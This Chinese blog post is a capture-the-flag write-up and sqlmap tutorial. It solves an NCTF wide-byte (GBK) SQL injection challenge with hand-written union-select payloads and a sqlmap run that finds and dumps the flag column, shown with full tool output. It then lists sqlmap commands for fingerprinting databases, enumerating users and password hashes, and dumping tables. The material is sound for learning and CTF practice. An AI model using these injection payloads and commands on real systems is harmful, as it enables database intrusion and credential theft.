sqlmap系列(一)

2018/08/17 安全 sqlmap 7073 words views

抛开场景来谈应用都是在瞎扯,在这里我就打算记录一下各个场景下 sqlmap 的使用。

0x01 场景

nctf 上的一道宽字节注入的题目
题目既然都提示的这么清楚了,直接尝试宽字节注入(%df):

step1:

index.php?id=%df%27 union select 1,2%23

step2:

index.php?id=%df%27 union select 1,table_name from information_schema.tables where table_schema=database() limit 1,1%23

后面都是常规的套路了,没啥可说的,找字段然后查询目标数据。但是这里的问题就出在查询目标数据上了,这里的注入的目的不是找到管理员的账号和密码,而是要找到 flag,要找 flag 的话,就要找到 flag 字段,找 flag 字段除了尝试(暴力破解)没有什么好的办法。

故这里废话不多说了,要么用脚本,要么用 sqlmap,这里选择用 sqlmap。

0x02 过程

python sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27" --search -C flag --level 3 --risk 1 --thread 10

--search C flag //后面跟参数 -D -T -C 搜索列(S),表(S)和/或数据库名称(S)
--level 3       //sqlmap默认测试所有的GET和POST参数,当--level的值大于等于2的时候也会测试HTTP Cookie头的值,当大于等于3的时候也会测试User-Agent和HTTP Referer头的值。最高可到5
--risk 3        // 执行测试的风险(0-3,默认为1)risk越高,越慢但是越安全
--threads 10    //如果你玩过 msfconsole的话会对这个很熟悉 sqlmap线程最高设置为10
$~/Desktop/weapons/sqlmap python sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27" --search -C flag --level 3 --risk 1 --thread 10
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.2#stable}
|_ -| . [.]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 11:17:56

[11:17:56] [WARNING] it appears that you have provided tainted parameter values ('id=1%df'') with most likely leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
are you really sure that you want to continue (sqlmap could have problems)? [y/N] y
·
·
·
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (3) and risk (1) values? [Y/n] n
·
·
·
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
[11:19:04] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql') 
[11:19:04] [INFO] testing 'Generic UNION query (48) - 21 to 40 columns'
[11:19:09] [INFO] testing 'Generic UNION query (48) - 41 to 60 columns'
[11:19:14] [INFO] testing 'MySQL UNION query (48) - 1 to 20 columns'
[11:19:17] [INFO] testing 'MySQL UNION query (48) - 21 to 40 columns'
[11:19:21] [INFO] testing 'MySQL UNION query (48) - 41 to 60 columns'
[11:19:26] [INFO] checking if the injection point on GET parameter 'id' is a false positive
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 187 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1%df' AND 8950=8950-- dURB

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1%df' AND SLEEP(5)-- Gkws
---
[11:19:37] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
do you want sqlmap to consider provided column(s):
[1] as LIKE column names (default)
[2] as exact column names
> 1
[11:20:11] [INFO] searching columns LIKE 'flag' across all databases
[11:20:11] [INFO] fetching number of databases with tables containing columns LIKE 'flag' across all databases
[11:20:11] [INFO] retrieved: 1
[11:20:12] [INFO] retrieving the length of query output
[11:20:12] [INFO] retrieved: 14
[11:20:19] [INFO] retrieved: sae-chinalover             
[11:20:19] [INFO] fetching number of tables containing columns LIKE 'flag' in database 'sae-chinalover'
[11:20:19] [INFO] retrieved: 1
[11:20:20] [INFO] retrieving the length of query output
[11:20:20] [INFO] retrieved: 4
[11:20:23] [INFO] retrieved: ctf4           
[11:20:23] [INFO] fetching columns LIKE 'flag' for table 'ctf4' in database 'sae-chinalover'
[11:20:23] [INFO] retrieved: 1
[11:20:25] [INFO] retrieving the length of query output
[11:20:25] [INFO] retrieved: 4
[11:20:28] [INFO] retrieved: flag           
columns LIKE 'flag' were found in the following databases:
Database: sae-chinalover
Table: ctf4
[1 column]
+--------+
| Column |
+--------+
| flag   |
+--------+

do you want to dump entries? [Y/n] y
which database(s)?
[a]ll (default)
[sae-chinalover]
[q]uit
> 
which table(s) of database 'sae-chinalover'?
[a]ll (default)
[ctf4]
[s]kip
[q]uit
> 
[11:21:10] [INFO] fetching entries of column(s) 'flag' for table 'ctf4' in database 'sae-chinalover'
[11:21:10] [INFO] fetching number of column(s) 'flag' entries for table 'ctf4' in database 'sae-chinalover'
[11:21:10] [INFO] retrieved: 1
[11:21:12] [INFO] retrieving the length of query output
[11:21:12] [INFO] retrieved: 15
[11:21:18] [INFO] retrieved: nctf{gbk_3sqli}             
Database: sae-chinalover
Table: ctf4
[1 entry]
+-----------------+
| flag            |
+-----------------+
| nctf{gbk_3sqli} |
+-----------------+

[11:21:18] [INFO] table '`sae-chinalover`.ctf4' dumped to CSV file '/Users/yangpeng/.sqlmap/output/chinalover.sinaapp.com/dump/sae-chinalover/ctf4.csv'
[11:21:18] [INFO] fetched data logged to text files under '/Users/yangpeng/.sqlmap/output/chinalover.sinaapp.com'

[*] shutting down at 11:21:18

0x03 常用

来自:http://www.youtube.com/user/inquisb/videos

1.Extensively fingerprint the back-end database management system, enumerate banner, session user, current database, users, users’ password hashes and databases
version: 0.8
target DB: MySQL 5.1
target web application: Apache 2.2 / PHP 5.2
targte OS: Debian GNU/Linux 5.0

python sqlmap "http://xxx/test.php?id=1" -f -b --current-user --current-db --users --passwords --dbs -v 0 

-u 		        //目标地址
-f              //执行检查广泛的DBMS版本指纹
-b              //检索数据库管理系统的标识
--current-user  //当前数据库用户
--current-db    //网站当前数据库
--users         //所有数据库用户
--passwords  	//枚举数据库用户密码哈希值
--dbs           //所有数据库
-v 		        //详细级别

2.Retrieve the database management system banner and enumerate the password hash(es) for database session user via UNION query SQL injection
version: 0.8
target DB: Oracle 10.2 Enterprise Edition
target web application: Apache 2.2 / PHP 5.2
targte OS: Debian GNU/Linux 5.0

python sqlmap "http://xxx/test.php?id=1" -b --passwords -U CU --union-use -v 2 

-u 		        //目标地址
-b              //检索数据库管理系统的标识
--passwords  	//枚举数据库用户密码哈希值
-U              //指定数据库用户(CU, 当前用户的别名)
--union-use     //如果可能,通过UNION查询SQL注入检索数据
-v 		        //详细级别(2, debug)

3.Dump only from the second to the third entry of column surname of table users
version: 0.8
target DB: SQL Server 2005
target web application: IIS6.0 / ASP
targte OS: Win2003 Service Pack 2

python sqlmap "http://xxx/test.asp?name=luther" --dump -T users -C username -D testdb --start 2 --stop 3 -v 2

-u 		//目标地址
--dump  //提取表中数据
-T      //目标表
-C      //目标字段
--start //要提取的第一个记录
--stop  //要提取的最后一个记录
-v 		//详细级别(2, debug)

0x04 参考

sqlmap document
http://www.vuln.cn/1992
乌云知识库还有几篇不错的文章


上一篇: 00截断上传
下一篇: NCTF 综合题2

Search

    Table of Contents